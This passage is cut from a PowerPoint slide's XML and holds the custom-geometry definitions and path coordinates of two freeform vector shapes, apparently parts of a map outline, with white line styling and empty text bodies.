            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36165" name="Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1575" y="2748"/>
                <a:ext cx="215" cy="187"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 215"/>
                  <a:gd name="T1" fmla="*/ 122 h 187"/>
                  <a:gd name="T2" fmla="*/ 173 w 215"/>
                  <a:gd name="T3" fmla="*/ 131 h 187"/>
                  <a:gd name="T4" fmla="*/ 162 w 215"/>
                  <a:gd name="T5" fmla="*/ 136 h 187"/>
                  <a:gd name="T6" fmla="*/ 143 w 215"/>
                  <a:gd name="T7" fmla="*/ 131 h 187"/>
                  <a:gd name="T8" fmla="*/ 143 w 215"/>
                  <a:gd name="T9" fmla="*/ 137 h 187"/>
                  <a:gd name="T10" fmla="*/ 150 w 215"/>
                  <a:gd name="T11" fmla="*/ 158 h 187"/>
                  <a:gd name="T12" fmla="*/ 159 w 215"/>
                  <a:gd name="T13" fmla="*/ 163 h 187"/>
                  <a:gd name="T14" fmla="*/ 147 w 215"/>
                  <a:gd name="T15" fmla="*/ 172 h 187"/>
                  <a:gd name="T16" fmla="*/ 132 w 215"/>
                  <a:gd name="T17" fmla="*/ 181 h 187"/>
                  <a:gd name="T18" fmla="*/ 123 w 215"/>
                  <a:gd name="T19" fmla="*/ 180 h 187"/>
                  <a:gd name="T20" fmla="*/ 106 w 215"/>
                  <a:gd name="T21" fmla="*/ 180 h 187"/>
                  <a:gd name="T22" fmla="*/ 100 w 215"/>
                  <a:gd name="T23" fmla="*/ 167 h 187"/>
                  <a:gd name="T24" fmla="*/ 89 w 215"/>
                  <a:gd name="T25" fmla="*/ 151 h 187"/>
                  <a:gd name="T26" fmla="*/ 93 w 215"/>
                  <a:gd name="T27" fmla="*/ 136 h 187"/>
                  <a:gd name="T28" fmla="*/ 87 w 215"/>
                  <a:gd name="T29" fmla="*/ 119 h 187"/>
                  <a:gd name="T30" fmla="*/ 90 w 215"/>
                  <a:gd name="T31" fmla="*/ 108 h 187"/>
                  <a:gd name="T32" fmla="*/ 75 w 215"/>
                  <a:gd name="T33" fmla="*/ 98 h 187"/>
                  <a:gd name="T34" fmla="*/ 60 w 215"/>
                  <a:gd name="T35" fmla="*/ 96 h 187"/>
                  <a:gd name="T36" fmla="*/ 45 w 215"/>
                  <a:gd name="T37" fmla="*/ 84 h 187"/>
                  <a:gd name="T38" fmla="*/ 22 w 215"/>
                  <a:gd name="T39" fmla="*/ 83 h 187"/>
                  <a:gd name="T40" fmla="*/ 17 w 215"/>
                  <a:gd name="T41" fmla="*/ 66 h 187"/>
                  <a:gd name="T42" fmla="*/ 5 w 215"/>
                  <a:gd name="T43" fmla="*/ 49 h 187"/>
                  <a:gd name="T44" fmla="*/ 7 w 215"/>
                  <a:gd name="T45" fmla="*/ 35 h 187"/>
                  <a:gd name="T46" fmla="*/ 20 w 215"/>
                  <a:gd name="T47" fmla="*/ 17 h 187"/>
                  <a:gd name="T48" fmla="*/ 24 w 215"/>
                  <a:gd name="T49" fmla="*/ 7 h 187"/>
                  <a:gd name="T50" fmla="*/ 28 w 215"/>
                  <a:gd name="T51" fmla="*/ 7 h 187"/>
                  <a:gd name="T52" fmla="*/ 24 w 215"/>
                  <a:gd name="T53" fmla="*/ 18 h 187"/>
                  <a:gd name="T54" fmla="*/ 26 w 215"/>
                  <a:gd name="T55" fmla="*/ 27 h 187"/>
                  <a:gd name="T56" fmla="*/ 22 w 215"/>
                  <a:gd name="T57" fmla="*/ 41 h 187"/>
                  <a:gd name="T58" fmla="*/ 32 w 215"/>
                  <a:gd name="T59" fmla="*/ 50 h 187"/>
                  <a:gd name="T60" fmla="*/ 37 w 215"/>
                  <a:gd name="T61" fmla="*/ 42 h 187"/>
                  <a:gd name="T62" fmla="*/ 31 w 215"/>
                  <a:gd name="T63" fmla="*/ 29 h 187"/>
                  <a:gd name="T64" fmla="*/ 30 w 215"/>
                  <a:gd name="T65" fmla="*/ 22 h 187"/>
                  <a:gd name="T66" fmla="*/ 51 w 215"/>
                  <a:gd name="T67" fmla="*/ 14 h 187"/>
                  <a:gd name="T68" fmla="*/ 57 w 215"/>
                  <a:gd name="T69" fmla="*/ 11 h 187"/>
                  <a:gd name="T70" fmla="*/ 55 w 215"/>
                  <a:gd name="T71" fmla="*/ 8 h 187"/>
                  <a:gd name="T72" fmla="*/ 48 w 215"/>
                  <a:gd name="T73" fmla="*/ 4 h 187"/>
                  <a:gd name="T74" fmla="*/ 54 w 215"/>
                  <a:gd name="T75" fmla="*/ 1 h 187"/>
                  <a:gd name="T76" fmla="*/ 57 w 215"/>
                  <a:gd name="T77" fmla="*/ 8 h 187"/>
                  <a:gd name="T78" fmla="*/ 62 w 215"/>
                  <a:gd name="T79" fmla="*/ 11 h 187"/>
                  <a:gd name="T80" fmla="*/ 76 w 215"/>
                  <a:gd name="T81" fmla="*/ 16 h 187"/>
                  <a:gd name="T82" fmla="*/ 85 w 215"/>
                  <a:gd name="T83" fmla="*/ 28 h 187"/>
                  <a:gd name="T84" fmla="*/ 109 w 215"/>
                  <a:gd name="T85" fmla="*/ 25 h 187"/>
                  <a:gd name="T86" fmla="*/ 123 w 215"/>
                  <a:gd name="T87" fmla="*/ 33 h 187"/>
                  <a:gd name="T88" fmla="*/ 140 w 215"/>
                  <a:gd name="T89" fmla="*/ 32 h 187"/>
                  <a:gd name="T90" fmla="*/ 161 w 215"/>
                  <a:gd name="T91" fmla="*/ 25 h 187"/>
                  <a:gd name="T92" fmla="*/ 177 w 215"/>
                  <a:gd name="T93" fmla="*/ 26 h 187"/>
                  <a:gd name="T94" fmla="*/ 165 w 215"/>
                  <a:gd name="T95" fmla="*/ 29 h 187"/>
                  <a:gd name="T96" fmla="*/ 176 w 215"/>
                  <a:gd name="T97" fmla="*/ 41 h 187"/>
                  <a:gd name="T98" fmla="*/ 185 w 215"/>
                  <a:gd name="T99" fmla="*/ 38 h 187"/>
                  <a:gd name="T100" fmla="*/ 200 w 215"/>
                  <a:gd name="T101" fmla="*/ 46 h 187"/>
                  <a:gd name="T102" fmla="*/ 184 w 215"/>
                  <a:gd name="T103" fmla="*/ 59 h 187"/>
                  <a:gd name="T104" fmla="*/ 197 w 215"/>
                  <a:gd name="T105" fmla="*/ 59 h 187"/>
                  <a:gd name="T106" fmla="*/ 215 w 215"/>
                  <a:gd name="T107" fmla="*/ 64 h 187"/>
                  <a:gd name="T108" fmla="*/ 203 w 215"/>
                  <a:gd name="T109" fmla="*/ 79 h 187"/>
                  <a:gd name="T110" fmla="*/ 203 w 215"/>
                  <a:gd name="T111" fmla="*/ 88 h 187"/>
                  <a:gd name="T112" fmla="*/ 193 w 215"/>
                  <a:gd name="T113" fmla="*/ 101 h 187"/>
                  <a:gd name="T114" fmla="*/ 203 w 215"/>
                  <a:gd name="T115" fmla="*/ 116 h 187"/>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215"/>
                  <a:gd name="T175" fmla="*/ 0 h 187"/>
                  <a:gd name="T176" fmla="*/ 215 w 215"/>
                  <a:gd name="T177" fmla="*/ 187 h 187"/>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215" h="187">
                    <a:moveTo>
                      <a:pt x="203" y="116"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="204" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="116"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36166" name="Freeform 299"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1755" y="2771"/>
                <a:ext cx="14" cy="13"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 13"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 2 h 13"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 2 h 13"/>
                  <a:gd name="T6" fmla="*/ 12 w 14"/>
                  <a:gd name="T7" fmla="*/ 3 h 13"/>
                  <a:gd name="T8" fmla="*/ 13 w 14"/>
                  <a:gd name="T9" fmla="*/ 5 h 13"/>
                  <a:gd name="T10" fmla="*/ 12 w 14"/>
                  <a:gd name="T11" fmla="*/ 6 h 13"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 8 h 13"/>
                  <a:gd name="T14" fmla="*/ 13 w 14"/>
                  <a:gd name="T15" fmla="*/ 12 h 13"/>
                  <a:gd name="T16" fmla="*/ 10 w 14"/>
                  <a:gd name="T17" fmla="*/ 13 h 13"/>
                  <a:gd name="T18" fmla="*/ 9 w 14"/>
                  <a:gd name="T19" fmla="*/ 13 h 13"/>
                  <a:gd name="T20" fmla="*/ 8 w 14"/>
                  <a:gd name="T21" fmla="*/ 13 h 13"/>
                  <a:gd name="T22" fmla="*/ 4 w 14"/>
                  <a:gd name="T23" fmla="*/ 13 h 13"/>
                  <a:gd name="T24" fmla="*/ 3 w 14"/>
                  <a:gd name="T25" fmla="*/ 13 h 13"/>
                  <a:gd name="T26" fmla="*/ 2 w 14"/>
                  <a:gd name="T27" fmla="*/ 12 h 13"/>
                  <a:gd name="T28" fmla="*/ 0 w 14"/>
                  <a:gd name="T29" fmla="*/ 12 h 13"/>
                  <a:gd name="T30" fmla="*/ 0 w 14"/>
                  <a:gd name="T31" fmla="*/ 12 h 13"/>
                  <a:gd name="T32" fmla="*/ 0 w 14"/>
                  <a:gd name="T33" fmla="*/ 12 h 13"/>
                  <a:gd name="T34" fmla="*/ 1 w 14"/>
                  <a:gd name="T35" fmla="*/ 11 h 13"/>
                  <a:gd name="T36" fmla="*/ 3 w 14"/>
                  <a:gd name="T37" fmla="*/ 10 h 13"/>
                  <a:gd name="T38" fmla="*/ 3 w 14"/>
                  <a:gd name="T39" fmla="*/ 10 h 13"/>
                  <a:gd name="T40" fmla="*/ 4 w 14"/>
                  <a:gd name="T41" fmla="*/ 10 h 13"/>
                  <a:gd name="T42" fmla="*/ 5 w 14"/>
                  <a:gd name="T43" fmla="*/ 10 h 13"/>
                  <a:gd name="T44" fmla="*/ 6 w 14"/>
                  <a:gd name="T45" fmla="*/ 9 h 13"/>
                  <a:gd name="T46" fmla="*/ 5 w 14"/>
                  <a:gd name="T47" fmla="*/ 7 h 13"/>
                  <a:gd name="T48" fmla="*/ 6 w 14"/>
                  <a:gd name="T49" fmla="*/ 6 h 13"/>
                  <a:gd name="T50" fmla="*/ 6 w 14"/>
                  <a:gd name="T51" fmla="*/ 5 h 13"/>
                  <a:gd name="T52" fmla="*/ 5 w 14"/>
